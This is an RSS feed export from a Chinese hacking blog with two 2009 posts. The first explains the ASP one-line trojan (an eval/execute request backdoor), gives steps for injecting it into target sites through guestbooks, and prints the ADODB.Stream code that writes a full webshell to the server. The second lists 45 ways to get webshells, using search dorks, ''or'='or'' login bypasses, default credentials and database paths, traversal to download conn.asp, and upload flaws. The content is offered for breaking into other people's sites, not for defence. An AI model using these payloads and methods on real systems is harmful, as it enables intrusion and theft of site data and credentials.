<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>柠檬工作室 &#187; 黑客技术</title>
	<atom:link href="http://www.crazylemon.net/category/hack/feed" rel="self" type="application/rss+xml" />
	<link>http://www.crazylemon.net</link>
	<description>上帝无用，天使无用</description>
	<lastBuildDate>Thu, 17 Nov 2011 19:39:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>一句话木马</title>
		<link>http://www.crazylemon.net/hack/2078.html</link>
		<comments>http://www.crazylemon.net/hack/2078.html#comments</comments>
		<pubDate>Mon, 28 Sep 2009 20:19:35 +0000</pubDate>
		<dc:creator>CrazyLemon</dc:creator>
				<category><![CDATA[黑客技术]]></category>
		<category><![CDATA[Charset]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[Html]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.crazylemon.net/?p=2078</guid>
		<description><![CDATA[一句话木马　　黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码： 　　&#60;%execute request(“value”)%&#62; 　　&#60;%eval request(“value”)%&#62;(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用) 　　当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道&#60;%eval request(“value”)%&#62;这个文件被插入到哪一个ASP文件里面就可以了。） 　　这就被称为一句话木马，它是基于B/S结构的。 使用方法 　　首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库 　　或者加进asp网页. 　　 记住!我们的目的是把一句话&#60;%execute request(“value”)%&#62;添加到数据库,无论任何方式! 　　然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后杀进去!,这就可以干你想干的事情了! 　　 一句话木马原理 　　首先&#60;SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT&#62;是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(&#8216;#&#8217;)+”这句代码,Request.form(&#8216;#&#8217;)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分,例如如下摘自一句话客户端的代码: 　　&#60;textarea name=# cols=”80&#8243; rows=”10&#8243;&#62; 　　set iP=server.createObject(“Adodb.Stream”) 　　iP.Open 　　iP.Type=2 　　iP.CharSet=”gb2312&#8243; 　　iP.writetext request(“aoyun”) 　　iP.SaveToFile server.mappath(“aoyunwan.asp”),2 　　iP.Close 　　set iP=nothing 　　response.redirect “aoyunwan.asp” 　　&#60;/textarea&#62; 　　学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form(&#8216;#&#8217;)),然后执行(使用eval(Request.form(&#8216;#&#8217;)+”)),也就是执行了: 　　set iP=server.createObject(“Adodb.Stream”) 　　iP.Open 　　iP.Type=2 　　iP.CharSet=”gb2312&#8243; 　　iP.writetext request(“aoyun”) 　　iP.SaveToFile server.mappath(“aoyunwan.asp”),2 　　iP.Close 　　set iP=nothing [...]]]></description>
			<content:encoded><![CDATA[<p>一句话木马　　黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：<br />
　　&lt;%execute request(“value”)%&gt;<br />
　　&lt;%eval request(“value”)%&gt;(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)<br />
　　当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道&lt;%eval request(“value”)%&gt;这个文件被插入到哪一个ASP文件里面就可以了。）<br />
　　这就被称为一句话木马，它是基于B/S结构的。<br />
使用方法<br />
　　首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库<br />
　　或者加进asp网页.<br />
　　 记住!我们的目的是把一句话&lt;%execute request(“value”)%&gt;添加到数据库,无论任何方式!<br />
　　然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后杀进去!,这就可以干你想干的事情了!<br />
　　<br />
一句话木马原理</p>
<p>　　首先&lt;SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT&gt;是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(&#8216;#&#8217;)+”这句代码,Request.form(&#8216;#&#8217;)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分,例如如下摘自一句话客户端的代码:<br />
　　&lt;textarea name=# cols=”80&#8243; rows=”10&#8243;&gt;<br />
　　set iP=server.createObject(“Adodb.Stream”)<br />
　　iP.Open<br />
　　iP.Type=2<br />
　　iP.CharSet=”gb2312&#8243;<br />
　　iP.writetext request(“aoyun”)<br />
　　iP.SaveToFile server.mappath(“aoyunwan.asp”),2<br />
　　iP.Close<br />
　　set iP=nothing<br />
　　response.redirect “aoyunwan.asp”<br />
　　&lt;/textarea&gt;<br />
　　学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form(&#8216;#&#8217;)),然后执行(使用eval(Request.form(&#8216;#&#8217;)+”)),也就是执行了:<br />
　　set iP=server.createObject(“Adodb.Stream”)<br />
　　iP.Open<br />
　　iP.Type=2<br />
　　iP.CharSet=”gb2312&#8243;<br />
　　iP.writetext request(“aoyun”)<br />
　　iP.SaveToFile server.mappath(“aoyunwan.asp”),2<br />
　　iP.Close<br />
　　set iP=nothing<br />
　　response.redirect “aoyunwan.asp”<br />
　　学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用对象中的writetext方法将 request(“aoyun”)读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们的大马的代码)写入服务端 的 aoyunwan.asp<br />
　　文件中,写入结束后使用set iP=nothing 释放对方 然后使用response.redirect “aoyunwan.asp” 转向写入的文件,就是我们最后见的大马了!<br />
　　<br />
关于服务器错误</p>
<p>　　经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:<br />
　　Script error detected at line 1.<br />
　　Source line: execute request(“nettoo”)<br />
　　Description: 类型不匹配: &#8216;execute&#8217;<br />
　　这个如何解决呢?<br />
　　想出了一个好办法,只要用”eval”替换掉”execute”服务端,就不会出错了!</p>
<h3  class="related_post_title">相关日志</h3><ul class="related_post"><li>04/10/2010 -- <a href="http://www.crazylemon.net/php/3068.html" title="GOOGLE翻墙代码">GOOGLE翻墙代码</a> (0)</li><li>06/16/2009 -- <a href="http://www.crazylemon.net/nginx/670.html" title="nginx.conf &#8211; nginx配置文件说明">nginx.conf &#8211; nginx配置文件说明</a> (1)</li><li>06/06/2009 -- <a href="http://www.crazylemon.net/nginx/510.html" title="nginx详解">nginx详解</a> (0)</li><li>02/07/2009 -- <a href="http://www.crazylemon.net/nginx/74.html" title="nginx配置详细说明">nginx配置详细说明</a> (0)</li><li>10/07/2010 -- <a href="http://www.crazylemon.net/windows/3581.html" title="Godaddy IIS7 ReWrite 规则的编写">Godaddy IIS7 ReWrite 规则的编写</a> (3)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.crazylemon.net/hack/2078.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>拿webshell的45种方法</title>
		<link>http://www.crazylemon.net/hack/2075.html</link>
		<comments>http://www.crazylemon.net/hack/2075.html#comments</comments>
		<pubDate>Mon, 28 Sep 2009 20:12:40 +0000</pubDate>
		<dc:creator>CrazyLemon</dc:creator>
				<category><![CDATA[黑客技术]]></category>
		<category><![CDATA[Backup]]></category>
		<category><![CDATA[Baidu]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Discuz]]></category>
		<category><![CDATA[Domain]]></category>
		<category><![CDATA[FTP服务器]]></category>
		<category><![CDATA[Google资讯]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[rar]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.crazylemon.net/?p=2075</guid>
		<description><![CDATA[     1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 　　2.到Google ,site:cq.cn inurl:asp 　　3.利用挖掘鸡和一个ASP木马. 　　文件名是login.asp 　　路径组是/manage/ 　　关键词是went.asp 　　用&#8217;or&#8217;='or&#8217;来登陆 　　4.关键字：Co Net MIB Ver 1.0网站后台管理系统 　　帐号密码为 &#8216;or&#8217;='or&#8217; 　　5.动感购物系统 　　inurl:help.asp登陆，如未注册成为会员! 　　upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞 　　6.默认数据库地址blogdata/acblog.asa 　　关键字：acblog 　　7.百度 /htdocs 　　注册里可以直接上传asa文件！ 　　8./Database/#newasp.mdb 　　关键词：NewAsp SiteManageSystem Version 　　9.用挖掘机 　　关键字：Powered by WEBBOY 　　页面：/upfile.asp 　　10.baidu中搜索关键字Ver5.0 Build 0519 　　(存在上传漏洞) 　　11.Upfile_Article.asp bbs/upfile.asp 　　输入关键字：powered by mypower ， 　　12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站 　　13.现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp 　　14.键字： 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 [...]]]></description>
			<content:encoded><![CDATA[<p>     1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!<br />
　　2.到Google ,site:cq.cn inurl:asp<br />
　　3.利用挖掘鸡和一个ASP木马.<br />
　　文件名是login.asp<br />
　　路径组是/manage/<br />
　　关键词是went.asp<br />
　　用&#8217;or&#8217;='or&#8217;来登陆<br />
　　4.关键字：Co Net MIB Ver 1.0网站后台管理系统<br />
　　帐号密码为 &#8216;or&#8217;='or&#8217;<br />
　　5.动感购物系统<br />
　　inurl:help.asp登陆，如未注册成为会员!<br />
　　upLoad_bm1.asp和upLoad_c1.asp这两个随便选个，一般管理员都忽视了这2漏洞<br />
　　6.默认数据库地址blogdata/acblog.asa<br />
　　关键字：acblog<br />
　　7.百度 /htdocs<br />
　　注册里可以直接上传asa文件！<br />
　　8./Database/#newasp.mdb<br />
　　关键词：NewAsp SiteManageSystem Version<br />
　　9.用挖掘机<br />
　　关键字：Powered by WEBBOY<br />
　　页面：/upfile.asp<br />
　　10.baidu中搜索关键字Ver5.0 Build 0519<br />
　　(存在上传漏洞)<br />
　　11.Upfile_Article.asp bbs/upfile.asp<br />
　　输入关键字：powered by mypower ，<br />
　　12.inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站<br />
　　13.现在GOOGLE搜索关键字 intitle:网站小助手　inurl:asp<br />
　　14.键字： 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛<br />
　　挖掘鸡的关键字 添 setup.asp<br />
　　15.VBulletin论坛的数据库<br />
　　默认数据库地址!<br />
　　/includes/functions.php<br />
　　工具:<br />
　　1.网站猎手 下载地址:百度 Google!<br />
　　2.Google<br />
　　关键字:<br />
　　Powered by: vBulletin Version 3.0.1<br />
　　Powered by: vBulletin Version 3.0.2<br />
　　Powered by: vBulletin Version 3.0.3<br />
　　其中一个就可以了<br />
　　16.<br />
　　1.打开百度或GOOGLE搜索，输入powered by comersus ASP shopping cart<br />
　　open source。 这是一个商场系统。<br />
　　2.网站的最底部分，有个 Comersus Open Technologies LC。打开看下~~comersus系统~<br />
　　猜到,comersus.mdb. 是数据库名<br />
　　数据库都是放在database/ 后的,<br />
　　所以database/comersus.mdb<br />
　　comersus_listCategoriesTree.asp换成database/comersus.mdb，不能下载。<br />
　　那样把前一个store/除去，再加上database/comersus.mdb 试试<br />
　　17.<br />
　　无忧传奇官方站点程序。<br />
　　1、后台管理地址：http://您的域名/msmiradmin/<br />
　　2、默认后台管理帐号：msmir<br />
　　3、默认后台管理密码：msmirmsmir<br />
　　数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb<br />
　　数据库连接文件为 ***********/Conn.asp<br />
　　18.<br />
　　百度里输入/skins/default/<br />
　　19.<br />
　　利用挖掘机<br />
　　关键机:power by Discuz<br />
　　路径:/wish.php<br />
　　配合:<br />
　　Discuz!论坛 wish.php远程包含漏洞 工具使用<br />
　　20.<br />
　　上传漏洞.<br />
　　工具 : Domain3.5<br />
　　网站猎手 1.5版<br />
　　关键字powered by mypower<br />
　　检测的页面或文件插入upfile_photo.asp<br />
　　21.<br />
　　新云漏洞<br />
　　这个漏洞ACCESS和SQL版通吃。<br />
　　Google搜索关键字 “关于本站 &#8211; 网站帮助 &#8211; 广告合作 &#8211; 下载声明 &#8211; 友情连接 &#8211; 网站地图 &#8211; 管理登录”<br />
　　把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp<br />
　　以源码，软件等下载站居多。<br />
　　大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了<br />
　　\database\%23newasp.mdb<br />
　　如：#xzws.mdb 改成%23xzws.mdb<br />
　　22.<br />
　　通吃所有商城+动力上传系统<br />
　　使用工具:挖掘鸡 v1.1 明小子<br />
　　商城入侵:<br />
　　关键字:选购-&gt;加入购物车-&gt;去收银台-&gt;确认收货人信息-&gt;选付款方式-&gt;选配送方式-&gt;在线支付或下单后汇款-&gt;汇款确认-&gt;发货-&gt;完成<br />
　　漏洞页面:upload.asp<br />
　　upfile_flash.asp<br />
　　动力入侵:<br />
　　关键字:powered by mypower<br />
　　漏洞页面:upfile_photo.asp<br />
　　Upfile_Soft.asp<br />
　　upfile_adpic.asp<br />
　　upfile_softpic.asp<br />
23.注射漏洞<br />
　　百度搜</p>
<p>索:oioj&#8217;s blog<br />
　　24<br />
　　动易<br />
　　列目录<br />
　　admin_articlerecyclebin.asp<br />
　　inurl:admin_articlerecyclebin.asp<br />
　　25.<br />
　　工具:网站猎手<br />
　　关键词:inurl:Went.asp<br />
　　后缀:manage/login.asp<br />
　　口令:&#8217;or&#8217;='or&#8217;<br />
　　26.<br />
　　入侵魔兽私服<br />
　　需要的工具：ASP木马一只。<br />
　　Domain3.5明小子<br />
　　关键字：All Right Reserved Design:游戏联盟<br />
　　后台地址：admin/login.asp<br />
　　数据库的地址：chngame/#chngame.mdb<br />
　　27.<br />
　　漏洞是利用管理员iis设置的失误<br />
　　用baidu 关键字就是比较罕见的脚本名<br />
　　动网: ReloadForumCache.asp<br />
　　Leadbbs: makealltopanc.asp<br />
　　BBSXP: admin_fso.asp<br />
　　动易: admin_articlerecyclebin.asp<br />
　　28.<br />
　　国外站的爆库漏洞<br />
　　关键字：sad Raven&#8217;s Guestbook<br />
　　密码地址:/passwd.dat<br />
　　后台地址:/admin.php<br />
　　29.<br />
　　Discuz 4.1.0跨站漏洞<br />
　　利用工具:1,WAP浏览器<br />
　　2,WAP编码转换器<br />
　　关键字:”intext:Discuz! 4.1.0&#8243;<br />
　　30.<br />
　　关键字：尚奈克斯<br />
　　后台路径/system/manage.asp<br />
　　直接传ASP木马<br />
　　31.<br />
　　工具<br />
　　1:网站猎手<br />
　　2:大马一个<br />
　　关键字:切勿关闭Cookies功能，否则您将不能登录<br />
　　插入diy.asp<br />
　　32.<br />
　　关键字:Team5 Studio All rights reserved<br />
　　默认数据库:data/team.mdb<br />
　　33.<br />
　　工具: 挖掘机 辅臣数据库读取器<br />
　　关键字: 企业简介 产品展示 产品列表<br />
　　后缀添加: /database/myszw.mdb<br />
　　后台地址: admin/Login.asp<br />
　　34.<br />
　　关键子 XXX inurl:Nclass.asp<br />
　　在”系统设置”里写个木马。<br />
　　会被保存到 在 config.asp内。<br />
　　35.<br />
　　不进后台照样拿动网WEBSHELL<br />
　　data.asp?action=BackupData 动网数据库备份默认路径<br />
　　36.<br />
　　工具:网站猎手 WebShell<br />
　　关键字:inurl:Went.asp<br />
　　后缀:manage/login.asp<br />
　　弱口令:&#8217;or&#8217;='or&#8217;<br />
　　37.<br />
　　关键字:Powered by:QCDN_NEWS<br />
　　随便扫遍文章加一个&#8217; ,来试探注入点<br />
　　后台地址:admin_index.asp<br />
　　38.<br />
　　入侵雷池新闻发布系统<br />
　　关键字:leichinews<br />
　　去掉leichinews后面的.<br />
　　打上:admin/uploadPic.asp?actionType=mod&amp;picName=xuanran.asp<br />
　　再上传马&#8230;..<br />
　　进访问uppic anran.asp 登陆马.<br />
　　39.<br />
　　关键字:Power System Of Article Management Ver 3.0 Build 20030628<br />
　　默认数据库:database\yiuwekdsodksldfslwifds.mdb<br />
　　后台地址:自己扫描!<br />
　　40.<br />
　　一、通过GOOGLE搜索找大量注入点<br />
　　关键字：asp?id=1 gov.jp/ asp?id=<br />
　　页数：100<br />
　　语言：想入侵哪个国家就填什么语言吧<br />
　　41.<br />
　　关键字：Powered by:94KKBBS 2005<br />
　　利用密码找回功能 找回admin<br />
　　提问:ddddd 回答:ddddd<br />
　　42.<br />
　　关键字:inurl:Went.asp<br />
　　后台为manage/login.asp<br />
　　后台密码: &#8216;or&#8217;=&#8217; 或者 &#8216;or=or&#8217; 登录　进入<br />
　　默认数据库地址:Database/DataShop.mdb<br />
　　43.<br />
　　关键字:****** inurl:readnews.asp<br />
　　把最后一个/改成%5c ,直接暴库,看密码,进后台<br />
　　随便添加个新闻 在标题输入我们的一句话木马<br />
　　44.<br />
　　工具:一句话木马<br />
　　BBsXp 5.0 sp1 管理员猜解器<br />
　　关键词:powered by bbsxp5.00<br />
　　进后台,备份一句话马!<br />
　　45.<br />
　　关键字：程序核心：BJXSHOP网上开店专家<br />
　　后台:/admin</p>
<h3  class="related_post_title">相关日志</h3><ul class="related_post"><li>03/22/2010 -- <a href="http://www.crazylemon.net/web/2976.html" title="什么是WHM？">什么是WHM？</a> (1)</li><li>06/02/2009 -- <a href="http://www.crazylemon.net/linux/375.html" title="linux psaadm 用户——什么是Plesk">linux psaadm 用户——什么是Plesk</a> (0)</li><li>09/30/2010 -- <a href="http://www.crazylemon.net/windows/3561.html" title="Zen Cart整合WordPress之Wordpress on ZenCart安装">Zen Cart整合WordPress之Wordpress on ZenCart安装</a> (0)</li><li>03/19/2010 -- <a href="http://www.crazylemon.net/seo/2971.html" title="lightinthebox的robots.txt">lightinthebox的robots.txt</a> (0)</li><li>12/01/2009 -- <a href="http://www.crazylemon.net/google-info/2606.html" title="Google注册域名大全">Google注册域名大全</a> (0)</li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.crazylemon.net/hack/2075.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

